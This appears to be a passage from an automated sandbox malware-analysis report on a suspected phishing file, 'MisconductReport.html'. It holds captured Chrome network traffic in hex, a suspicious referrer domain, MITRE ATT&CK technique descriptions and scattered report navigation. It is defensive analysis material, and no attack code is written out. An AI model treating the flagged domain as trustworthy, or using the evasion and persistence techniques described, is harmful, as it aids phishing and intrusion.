2024-02-26 17:13:34 UTC	4096	IN	Data Raw: 6f 66 74 2e 63 6f 6d 2f 70 6b 69 2f 63 65 72 74 73 2f 4d 69 63 52 6f 6f 43 65 72 41 75 74 32 30 31 31 5f 32 30 31 31 5f 30 33 5f 32 32 2e 63 72 74 30 1f 06 03 55 1d 25 04 18 30 16 06 08 2b 06 01 05 05 07 03 03 06 0a 2b 06 01 04 01 82 37 4c 06 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 02 01 00 8c b9 61 38 aa 05 68 bb d3 e5 5e df fe 32 a5 53 e3 64 f9 9e 2f 13 f6 ac cb f9 07 51 b6 f5 54 79 d8 8f 9c bf a9 f6 b1 43 9a 72 3c a3 26 ab ac 83 7e f1 d8 3b d5 b5 0f e4 ec fd d7 fc 15 92 9a e2 9b d8 e0 70 c7 6b a3 cd ee cd 9a 38 95 4d 26 35 75 50 8f f6 9f 18 45 ad fb 67 00 f9 31 a2 1a 50 d1 4e da 56 83 64 11 9b 4c 1d 0d d4 d0 37 cb fc a1 5c 58 3a 86 59 e5 63 0c a8 e6 37 e9 52 c0 51 1f 8c 93 6d f8 31 65 77 d9 81 94 41 e0 b1 0d 7c d5 30 7c 9d 6a 20 33 de d1 Data Ascii: oft.com/pki/certs/MicRooCerAut2011_2011_03_22.crt0U%0++7L0*Ha8h^2Sd/QTyCr<&~;pk8M&5uPEg1PNVdL7\X:Yc7RQm1ewA\|0\|j 3
2024-02-26 17:13:34 UTC	4096	IN	Data Raw: fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a 0f 89 16 ba 61 a7 11 cb 9a d8 0e 47 9a Data Ascii: Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9WvqaG
2024-02-26 17:13:34 UTC	4096	IN	Data Raw: 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 70 6b 69 6f 70 73 2f 63 65 72 74 73 2f 4d 69 63 72 6f 73 6f 66 74 25 32 30 45 43 43 25 32 30 50 72 6f 64 75 63 74 25 32 30 52 6f 6f 74 25 32 30 43 65 72 74 69 66 69 63 61 74 65 25 32 30 41 75 74 68 6f 72 69 74 79 25 32 30 32 30 31 38 2e 63 72 74 30 0a 06 08 2a 86 48 ce 3d 04 03 03 03 68 00 30 65 02 31 00 b7 93 af 35 c2 bd c0 e1 13 50 4f a3 61 01 58 6f d9 cc 6a f3 d9 26 6c 63 6d 0c 82 c3 cf f3 73 14 35 8a b3 70 34 fc f8 98 37 29 9e 9d 9b 16 c5 d4 02 30 5e 03 ef a0 62 cb 6d 9d 1b 05 00 9c 0e 64 ce 2f 1f 10 8d 4f 5c 70 c3 58 ed b2 81 bb 0f a8 ef 70 dd af 39 40 ab 2c 5d 27 31 be 57 66 03 73 10 a6 31 82 14 b5 30 82 14 b1 02 01 01 30 81 9a 30 81 82 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 Data Ascii: icrosoft.com/pkiops/certs/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crt0*H=h0e15POaXoj&lcms5p47)0^bmd/O\pXp9@,]'1Wfs100010UUS10UW
2024-02-26 17:13:34 UTC	1428	IN	Data Raw: 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f 73 6f 66 74 20 49 72 65 6c 61 6e 64 20 4f 70 65 72 61 74 69 6f 6e 73 20 4c 69 6d 69 74 65 64 31 26 30 24 06 03 55 04 0b 13 1d 54 68 61 6c 65 73 20 54 53 53 20 45 53 4e 3a 38 44 34 31 2d 34 42 46 37 2d 42 33 42 37 31 25 30 23 06 03 55 04 03 13 1c 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 73 65 72 76 69 63 65 a2 23 0a 01 01 30 07 06 05 2b 0e 03 02 1a 03 15 00 bf fc 4a de 89 a4 0c 87 aa 6b 6d 06 f3 7f 9f 4b ba 49 2d a1 a0 81 83 30 81 80 a4 7e 30 7c 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f Data Ascii: ft Corporation1-0+U$Microsoft Ireland Operations Limited1&0$UThales TSS ESN:8D41-4BF7-B3B71%0#UMicrosoft Time-Stamp service#0+JkmKI-0~0\|10UUS10UWashington10URedmond10UMicro

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49742	35.190.80.1	443	2148	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-26 17:13:43 UTC	531	OUT	OPTIONS /report/v3?s=rxg2wLNOqsUkNdECmNqpR0ejq5GBwBzX%2BnW5Q7lkAXEuqaE4BPWmxV2h%2BfanqVw6lfP4f3ZraHDprxL8D3yui5pf6NjYjS8oeB2uOTeM4MCTB046ZCaTWR8CvXL%2F HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://horizon.sologerg.com Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-26 17:13:43 UTC	336	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: POST, OPTIONS access-control-allow-origin: * access-control-allow-headers: content-type, content-length date: Mon, 26 Feb 2024 17:13:42 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49743	35.190.80.1	443	2148	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-26 17:13:43 UTC	468	OUT	POST /report/v3?s=rxg2wLNOqsUkNdECmNqpR0ejq5GBwBzX%2BnW5Q7lkAXEuqaE4BPWmxV2h%2BfanqVw6lfP4f3ZraHDprxL8D3yui5pf6NjYjS8oeB2uOTeM4MCTB046ZCaTWR8CvXL%2F HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 985 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-26 17:13:43 UTC	985	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 34 38 36 32 35 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 36 31 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 68 6f 72 69 7a 6f 6e 2e 73 6f 6c 6f 67 65 72 67 2e 63 6f 6d 2f 68 69 68 69 68 6a 69 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 32 30 2e 39 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f Data Ascii: [{"age":48625,"body":{"elapsed_time":2616,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://horizon.sologerg.com/hihihji/","sampling_fraction":1.0,"server_ip":"104.21.20.93","status_code":404,"type":"http.error"},"type":"netwo
2024-02-26 17:13:43 UTC	168	IN	HTTP/1.1 200 OK Content-Length: 0 date: Mon, 26 Feb 2024 17:13:43 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49746	172.253.63.113	443	2148	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-26 17:14:08 UTC	449	OUT	GET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=0000000000000000000000000000000000000000798875FE8C HTTP/1.1 Host: clients1.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br
2024-02-26 17:14:08 UTC	817	IN	HTTP/1.1 200 OK Content-Security-Policy: script-src 'report-sample' 'nonce-cwCSuKLPnRHPFDa5qN2P_A' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/download-dt/1 Content-Security-Policy: script-src 'report-sample' 'nonce-teXB5Y1IyqYz2rK7Ry8QVw' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/download-dt/1 Content-Type: text/plain; charset=utf-8 Content-Length: 220 Date: Mon, 26 Feb 2024 17:14:08 GMT Expires: Mon, 26 Feb 2024 17:14:08 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-02-26 17:14:08 UTC	220	IN	Data Raw: 72 6c 7a 43 31 3a 20 31 43 31 4f 4e 47 52 5f 65 6e 55 53 31 30 39 39 0a 72 6c 7a 43 32 3a 20 31 43 32 4f 4e 47 52 5f 65 6e 55 53 31 30 39 39 0a 72 6c 7a 43 37 3a 20 31 43 37 4f 4e 47 52 5f 65 6e 55 53 31 30 39 39 0a 64 63 63 3a 20 0a 73 65 74 5f 64 63 63 3a 20 43 31 3a 31 43 31 4f 4e 47 52 5f 65 6e 55 53 31 30 39 39 2c 43 32 3a 31 43 32 4f 4e 47 52 5f 65 6e 55 53 31 30 39 39 2c 43 37 3a 31 43 37 4f 4e 47 52 5f 65 6e 55 53 31 30 39 39 0a 65 76 65 6e 74 73 3a 20 43 31 49 2c 43 32 49 2c 43 37 49 2c 43 31 53 2c 43 37 53 0a 73 74 61 74 65 66 75 6c 2d 65 76 65 6e 74 73 3a 20 43 31 49 2c 43 32 49 2c 43 37 49 0a 63 72 63 33 32 3a 20 66 33 30 35 63 61 66 66 0a Data Ascii: rlzC1: 1C1ONGR_enUS1099rlzC2: 1C2ONGR_enUS1099rlzC7: 1C7ONGR_enUS1099dcc: set_dcc: C1:1C1ONGR_enUS1099,C2:1C2ONGR_enUS1099,C7:1C7ONGR_enUS1099events: C1I,C2I,C7I,C1S,C7Sstateful-events: C1I,C2I,C7Icrc32: f305caff

Target ID:	0
Start time:	18:12:33
Start date:	26/02/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\MisconductReport.html
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	18:12:36
Start date:	26/02/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2228,i,2469113604388582169,10031896183917064165,262144 /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report MisconductReport.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 81

Chrome Cache Entry: 82

Chrome Cache Entry: 83

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 6556, Parent PID: 5728

General

Chronological Activities

Windows Analysis Report
MisconductReport.html